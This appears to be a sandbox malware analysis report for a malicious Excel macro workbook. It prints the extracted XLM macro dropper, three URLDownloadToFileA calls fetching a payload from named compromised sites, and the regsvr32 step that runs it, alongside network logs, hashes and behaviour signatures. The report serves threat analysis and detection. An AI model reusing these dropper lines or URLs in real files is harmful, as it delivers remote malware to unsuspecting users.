Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Overview

overview

10

Static

static

10

da2bb624ea...7.xlsm

windows7-x64

10

da2bb624ea...7.xlsm

windows10-2004-x64

10

Analysis

  • max time kernel
    133s
  • max time network
    142s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20241007-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20241007-enlocale:en-usos:windows10-2004-x64system
  • submitted
    20/11/2024, 23:19 UTC

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    da2bb624ea7c36ff8a6386d3a1f02d61177847b6f3d3d0e69002e68a5f526637.xlsm

  • Size

    46KB

  • MD5

    8995506dcfcf432deb83b80b897640bf

  • SHA1

    bad1dd0bdc62941fb56778afae0e307a0a5b6a81

  • SHA256

    da2bb624ea7c36ff8a6386d3a1f02d61177847b6f3d3d0e69002e68a5f526637

  • SHA512

    c5fd38cbc3d3177b1946165140bf590c9392ab6979c7917c56bc621a4a0a47d310d819ea805fe50ffcff6a22f37e4b32a3e621f6d920068d0ab56cd8941a68b1

  • SSDEEP

    768:74xovDOevZCwrvtizdDTKufT9nz0LTyY1NiMZFYpvrLeci3cr+Uh0VU2nrW:76ovDStT5fTR4Lh1NisFYBc3cr+UqVUf

Score
10/10
discovery

Malware Config

Extracted

Language
xlm4.0
Source
1
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://consejosdeorlando.com/wp-includes/certificates/v1p9N/", "..\enu.ocx")
2
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://mentalpeaks.pro/kymogram/eU1VLEZ99gyh/", "..\enu.ocx")
3
=CALL("urlmon", "URLDownloadToFileA", "JCCB", 0, "http://www.pancoc.com/wp-admin/O3yPsMRR4CtJ9H/", "..\enu.ocx")
URLs
xlm40.dropper

http://consejosdeorlando.com/wp-includes/certificates/v1p9N/
xlm40.dropper

http://mentalpeaks.pro/kymogram/eU1VLEZ99gyh/
xlm40.dropper

http://www.pancoc.com/wp-admin/O3yPsMRR4CtJ9H/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • System Location Discovery: System Language Discovery 1 TTPs 1 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks processor information in registry 2 TTPs 3 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious use of FindShellTrayWindow 2 IoCs
  • Suspicious use of SetWindowsHookEx 12 IoCs
  • Suspicious use of WriteProcessMemory 3 IoCs

Processes

  • C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE
    "C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\da2bb624ea7c36ff8a6386d3a1f02d61177847b6f3d3d0e69002e68a5f526637.xlsm"
    1⤵
    • Checks processor information in registry
    • Enumerates system info in registry
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:3924
    • C:\Windows\SysWow64\regsvr32.exe
      C:\Windows\SysWow64\regsvr32.exe /s ..\enu.ocx
      2⤵
      • Process spawned unexpected child process
      • System Location Discovery: System Language Discovery
      PID:2532

Network

  • flag-us
    DNS
    8.8.8.8.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    8.8.8.8.in-addr.arpa
    IN PTR
    Response
    8.8.8.8.in-addr.arpa
    IN PTR
    dnsgoogle
  • flag-us
    DNS
    232.168.11.51.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    232.168.11.51.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    172.210.232.199.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    172.210.232.199.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    240.76.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    240.76.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    roaming.officeapps.live.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    roaming.officeapps.live.com
    IN A
    Response
    roaming.officeapps.live.com
    IN CNAME
    prod.roaming1.live.com.akadns.net
    prod.roaming1.live.com.akadns.net
    IN CNAME
    eur.roaming1.live.com.akadns.net
    eur.roaming1.live.com.akadns.net
    IN CNAME
    uks-azsc-000.roaming.officeapps.live.com
    uks-azsc-000.roaming.officeapps.live.com
    IN CNAME
    osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
    osiprod-uks-buff-azsc-000.uksouth.cloudapp.azure.com
    IN A
    52.109.28.47
  • flag-gb
    POST
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    EXCEL.EXE
    Remote address:
    52.109.28.47:443
    Request
    POST /rs/RoamingSoapService.svc HTTP/1.1
    Cache-Control: no-cache
    Connection: Keep-Alive
    Pragma: no-cache
    Content-Type: text/xml; charset=utf-8
    User-Agent: MS-WebServices/1.0
    SOAPAction: "http://tempuri.org/IRoamingSettingsService/GetConfig"
    Content-Length: 511
    Host: roaming.officeapps.live.com
    Response
    HTTP/1.1 200 OK
    Cache-Control: private
    Content-Type: text/xml; charset=utf-8
    Server: Microsoft-IIS/10.0
    X-OfficeFE: RoamingFE_IN_178
    X-OfficeVersion: 16.0.18311.30577
    X-OfficeCluster: uks-000.roaming.officeapps.live.com
    Content-Security-Policy-Report-Only: script-src 'nonce-teyNbzCqvbB187PARrcFKWykZafDrf1d86jNHU32EeLKWmYNGTVwQPzP8IPrZH6f1uL9lxnSzcy76x/vRYT94z1rbmXlndIvHo+KUU2XAiWWaj+hJKWLmE+4JnH9Z40CmA5sqZ0S4EF6WhCQ6Xr8fVYVvYgm2iz8c1bpwVyvltE=' 'unsafe-inline' 'unsafe-eval' 'strict-dynamic' https:; base-uri 'self'; object-src 'none'; require-trusted-types-for 'script'; report-uri https://csp.microsoft.com/report/OfficeIce-OfficeRoaming-Prod
    X-CorrelationId: d4300188-34ac-4593-b04b-2f71e70044ef
    X-Powered-By: ASP.NET
    Date: Wed, 20 Nov 2024 23:19:36 GMT
    Content-Length: 654
  • flag-us
    DNS
    consejosdeorlando.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    consejosdeorlando.com
    IN A
    Response
    consejosdeorlando.com
    IN A
    143.244.213.188
  • flag-us
    GET
    http://consejosdeorlando.com/wp-includes/certificates/v1p9N/
    EXCEL.EXE
    Remote address:
    143.244.213.188:80
    Request
    GET /wp-includes/certificates/v1p9N/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: consejosdeorlando.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 308 Permanent Redirect
    Date: Wed, 20 Nov 2024 23:19:37 GMT
    Content-Type: text/html
    Content-Length: 164
    Connection: keep-alive
    Location: https://consejosdeorlando.com/wp-includes/certificates/v1p9N
  • flag-us
    GET
    https://consejosdeorlando.com/wp-includes/certificates/v1p9N
    EXCEL.EXE
    Remote address:
    143.244.213.188:443
    Request
    GET /wp-includes/certificates/v1p9N HTTP/2.0
    host: consejosdeorlando.com
    accept: */*
    ua-cpu: AMD64
    accept-encoding: gzip, deflate
    user-agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Response
    HTTP/2.0 404
    date: Wed, 20 Nov 2024 23:19:40 GMT
    content-type: text/html; charset=UTF-8
    vary: Accept-Encoding
    expires: Wed, 11 Jan 1984 05:00:00 GMT
    cache-control: no-cache, must-revalidate, max-age=0
    link: <https://consejosdeorlando.com/wp-json/>; rel="https://api.w.org/"
    content-encoding: gzip
    strict-transport-security: max-age=15724800; includeSubDomains
  • flag-us
    DNS
    r10.o.lencr.org
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    r10.o.lencr.org
    IN A
    Response
    r10.o.lencr.org
    IN CNAME
    o.lencr.edgesuite.net
    o.lencr.edgesuite.net
    IN CNAME
    a1887.dscq.akamai.net
    a1887.dscq.akamai.net
    IN A
    88.221.134.89
    a1887.dscq.akamai.net
    IN A
    88.221.135.105
  • flag-gb
    GET
    http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgSO5H5l1Sl2ax7gdoznq3AtSQ%3D%3D
    EXCEL.EXE
    Remote address:
    88.221.134.89:80
    Request
    GET /MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgSO5H5l1Sl2ax7gdoznq3AtSQ%3D%3D HTTP/1.1
    Connection: Keep-Alive
    Accept: */*
    User-Agent: Microsoft-CryptoAPI/10.0
    Host: r10.o.lencr.org
    Response
    HTTP/1.1 200 OK
    Server: nginx
    Content-Type: application/ocsp-response
    Content-Length: 504
    ETag: "73C218A5EA306E1039BDCD4000BB602529FA57036C426CDDFDCB4E4960B8AE0E"
    Last-Modified: Wed, 20 Nov 2024 19:06:00 UTC
    Cache-Control: public, no-transform, must-revalidate, max-age=14981
    Expires: Thu, 21 Nov 2024 03:29:19 GMT
    Date: Wed, 20 Nov 2024 23:19:38 GMT
    Connection: keep-alive
  • flag-us
    DNS
    47.28.109.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    47.28.109.52.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    95.221.229.192.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    95.221.229.192.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    188.213.244.143.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    188.213.244.143.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    2.159.190.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    2.159.190.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    168.245.100.95.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    168.245.100.95.in-addr.arpa
    IN PTR
    Response
    168.245.100.95.in-addr.arpa
    IN PTR
    a95-100-245-168deploystaticakamaitechnologiescom
  • flag-us
    DNS
    89.134.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    89.134.221.88.in-addr.arpa
    IN PTR
    Response
    89.134.221.88.in-addr.arpa
    IN PTR
    a88-221-134-89deploystaticakamaitechnologiescom
  • flag-us
    DNS
    mentalpeaks.pro
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    mentalpeaks.pro
    IN A
    Response
  • flag-us
    DNS
    www.pancoc.com
    EXCEL.EXE
    Remote address:
    8.8.8.8:53
    Request
    www.pancoc.com
    IN A
    Response
    www.pancoc.com
    IN A
    13.248.169.48
    www.pancoc.com
    IN A
    76.223.54.146
  • flag-us
    GET
    http://www.pancoc.com/wp-admin/O3yPsMRR4CtJ9H/
    EXCEL.EXE
    Remote address:
    13.248.169.48:80
    Request
    GET /wp-admin/O3yPsMRR4CtJ9H/ HTTP/1.1
    Accept: */*
    UA-CPU: AMD64
    Accept-Encoding: gzip, deflate
    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
    Host: www.pancoc.com
    Connection: Keep-Alive
    Response
    HTTP/1.1 200 OK
    Server: openresty
    Date: Wed, 20 Nov 2024 23:19:41 GMT
    Content-Type: text/html
    Content-Length: 114
    Connection: keep-alive
  • flag-us
    DNS
    48.169.248.13.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    48.169.248.13.in-addr.arpa
    IN PTR
    Response
    48.169.248.13.in-addr.arpa
    IN PTR
    a904c694c05102f30awsglobalacceleratorcom
  • flag-us
    DNS
    131.72.42.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    131.72.42.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    53.210.109.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    53.210.109.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    198.187.3.20.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    198.187.3.20.in-addr.arpa
    IN PTR
    Response
  • flag-us
    DNS
    18.134.221.88.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    18.134.221.88.in-addr.arpa
    IN PTR
    Response
    18.134.221.88.in-addr.arpa
    IN PTR
    a88-221-134-18deploystaticakamaitechnologiescom
  • flag-us
    DNS
    11.227.111.52.in-addr.arpa
    Remote address:
    8.8.8.8:53
    Request
    11.227.111.52.in-addr.arpa
    IN PTR
    Response
  • 52.109.28.47:443
    https://roaming.officeapps.live.com/rs/RoamingSoapService.svc
    tls, http
    EXCEL.EXE
    1.8kB
     8.2kB
     12
    11

    HTTP Request

    POST https://roaming.officeapps.live.com/rs/RoamingSoapService.svc

    HTTP Response

    200
  • 143.244.213.188:80
    http://consejosdeorlando.com/wp-includes/certificates/v1p9N/
    http
    EXCEL.EXE
    608 B
     590 B
     6
    5

    HTTP Request

    GET http://consejosdeorlando.com/wp-includes/certificates/v1p9N/

    HTTP Response

    308
  • 143.244.213.188:443
    https://consejosdeorlando.com/wp-includes/certificates/v1p9N
    tls, http2
    EXCEL.EXE
    2.3kB
     29.7kB
     35
    31

    HTTP Request

    GET https://consejosdeorlando.com/wp-includes/certificates/v1p9N

    HTTP Response

    404
  • 88.221.134.89:80
    http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgSO5H5l1Sl2ax7gdoznq3AtSQ%3D%3D
    http
    EXCEL.EXE
    516 B
     1.1kB
     6
    4

    HTTP Request

    GET http://r10.o.lencr.org/MFMwUTBPME0wSzAJBgUrDgMCGgUABBRpD%2BQVZ%2B1vf7U0RGQGBm8JZwdxcgQUdKR2KRcYVIUxN75n5gZYwLzFBXICEgSO5H5l1Sl2ax7gdoznq3AtSQ%3D%3D

    HTTP Response

    200
  • 13.248.169.48:80
    http://www.pancoc.com/wp-admin/O3yPsMRR4CtJ9H/
    http
    EXCEL.EXE
    594 B
     471 B
     6
    5

    HTTP Request

    GET http://www.pancoc.com/wp-admin/O3yPsMRR4CtJ9H/

    HTTP Response

    200
  • 8.8.8.8:53
    8.8.8.8.in-addr.arpa
    dns
    66 B
     90 B
     1
    1

    DNS Request

    8.8.8.8.in-addr.arpa

  • 8.8.8.8:53
    232.168.11.51.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    232.168.11.51.in-addr.arpa

  • 8.8.8.8:53
    172.210.232.199.in-addr.arpa
    dns
    74 B
     128 B
     1
    1

    DNS Request

    172.210.232.199.in-addr.arpa

  • 8.8.8.8:53
    240.76.109.52.in-addr.arpa
    dns
    72 B
     146 B
     1
    1

    DNS Request

    240.76.109.52.in-addr.arpa

  • 8.8.8.8:53
    roaming.officeapps.live.com
    dns
    EXCEL.EXE
    73 B
     244 B
     1
    1

    DNS Request

    roaming.officeapps.live.com

    DNS Response

    52.109.28.47

  • 8.8.8.8:53
    consejosdeorlando.com
    dns
    EXCEL.EXE
    67 B
     83 B
     1
    1

    DNS Request

    consejosdeorlando.com

    DNS Response

    143.244.213.188

  • 8.8.8.8:53
    r10.o.lencr.org
    dns
    EXCEL.EXE
    61 B
     160 B
     1
    1

    DNS Request

    r10.o.lencr.org

    DNS Response

    88.221.134.89
    88.221.135.105

  • 8.8.8.8:53
    47.28.109.52.in-addr.arpa
    dns
    71 B
     145 B
     1
    1

    DNS Request

    47.28.109.52.in-addr.arpa

  • 8.8.8.8:53
    95.221.229.192.in-addr.arpa
    dns
    73 B
     144 B
     1
    1

    DNS Request

    95.221.229.192.in-addr.arpa

  • 8.8.8.8:53
    188.213.244.143.in-addr.arpa
    dns
    74 B
     141 B
     1
    1

    DNS Request

    188.213.244.143.in-addr.arpa

  • 8.8.8.8:53
    2.159.190.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    2.159.190.20.in-addr.arpa

  • 8.8.8.8:53
    168.245.100.95.in-addr.arpa
    dns
    73 B
     139 B
     1
    1

    DNS Request

    168.245.100.95.in-addr.arpa

  • 8.8.8.8:53
    89.134.221.88.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    89.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    mentalpeaks.pro
    dns
    EXCEL.EXE
    61 B
     143 B
     1
    1

    DNS Request

    mentalpeaks.pro

  • 8.8.8.8:53
    www.pancoc.com
    dns
    EXCEL.EXE
    60 B
     92 B
     1
    1

    DNS Request

    www.pancoc.com

    DNS Response

    13.248.169.48
    76.223.54.146

  • 8.8.8.8:53
    48.169.248.13.in-addr.arpa
    dns
    72 B
     128 B
     1
    1

    DNS Request

    48.169.248.13.in-addr.arpa

  • 8.8.8.8:53
    131.72.42.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    131.72.42.20.in-addr.arpa

  • 8.8.8.8:53
    53.210.109.20.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    53.210.109.20.in-addr.arpa

  • 8.8.8.8:53
    198.187.3.20.in-addr.arpa
    dns
    71 B
     157 B
     1
    1

    DNS Request

    198.187.3.20.in-addr.arpa

  • 8.8.8.8:53
    18.134.221.88.in-addr.arpa
    dns
    72 B
     137 B
     1
    1

    DNS Request

    18.134.221.88.in-addr.arpa

  • 8.8.8.8:53
    11.227.111.52.in-addr.arpa
    dns
    72 B
     158 B
     1
    1

    DNS Request

    11.227.111.52.in-addr.arpa

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\enu.ocx
    Filesize

    114B

    MD5

    e89f75f918dbdcee28604d4e09dd71d7

    SHA1

    f9d9055e9878723a12063b47d4a1a5f58c3eb1e9

    SHA256

    6dc9c7fc93bb488bb0520a6c780a8d3c0fb5486a4711aca49b4c53fac7393023

    SHA512

    8df0ab2e3679b64a6174deff4259ae5680f88e3ae307e0ea2dfff88ec4ba14f3477c9fe3a5aa5da3a8e857601170a5108ed75f6d6975958ac7a314e4a336aed0

    Download Submit

  • memory/3924-6-0x00007FF9F38D0000-0x00007FF9F3AC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3924-12-0x00007FF9F38D0000-0x00007FF9F3AC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3924-4-0x00007FF9F396D000-0x00007FF9F396E000-memory.dmp

    Filesize

    4KB

    Download

  • memory/3924-2-0x00007FF9B3950000-0x00007FF9B3960000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-9-0x00007FF9F38D0000-0x00007FF9F3AC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3924-8-0x00007FF9F38D0000-0x00007FF9F3AC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3924-7-0x00007FF9F38D0000-0x00007FF9F3AC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3924-0-0x00007FF9B3950000-0x00007FF9B3960000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-1-0x00007FF9B3950000-0x00007FF9B3960000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-10-0x00007FF9F38D0000-0x00007FF9F3AC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3924-5-0x00007FF9B3950000-0x00007FF9B3960000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-13-0x00007FF9F38D0000-0x00007FF9F3AC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3924-15-0x00007FF9F38D0000-0x00007FF9F3AC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3924-14-0x00007FF9F38D0000-0x00007FF9F3AC5000-memory.dmp

    Filesize

    2.0MB

    Download

  • memory/3924-16-0x00007FF9B1540000-0x00007FF9B1550000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-11-0x00007FF9B1540000-0x00007FF9B1550000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-3-0x00007FF9B3950000-0x00007FF9B3960000-memory.dmp

    Filesize

    64KB

    Download

  • memory/3924-38-0x00007FF9F38D0000-0x00007FF9F3AC5000-memory.dmp

    Filesize

    2.0MB

    Download

We care about your privacy.

This website stores cookies on your computer. These cookies are used to improve your website experience and provide more personalized services to you, both on this website and through other media. To find out more about the cookies we use, see our Privacy Policy.